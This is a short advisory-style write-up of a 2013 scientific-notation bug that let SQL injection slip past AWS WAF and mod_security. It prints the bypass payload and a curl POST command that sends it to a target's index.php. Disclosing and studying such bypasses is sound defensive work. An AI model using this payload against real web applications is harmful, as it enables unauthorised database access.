Scientific Notation bug bypass AWS WAF protection
AWS WAF and mod_security Apache module were affected by a scientific notation bug discovered back in 2013 that allowed to bypass the WAF to successfully exploit a SQL injection vulnerability.
Find below the payload used for the attack showing the scientific notation:
"x=1' or 1.e(1) or '1'='1"
Executing the following command it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:
$ curl -i -H "Origin: http://domain" -X POST \ "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"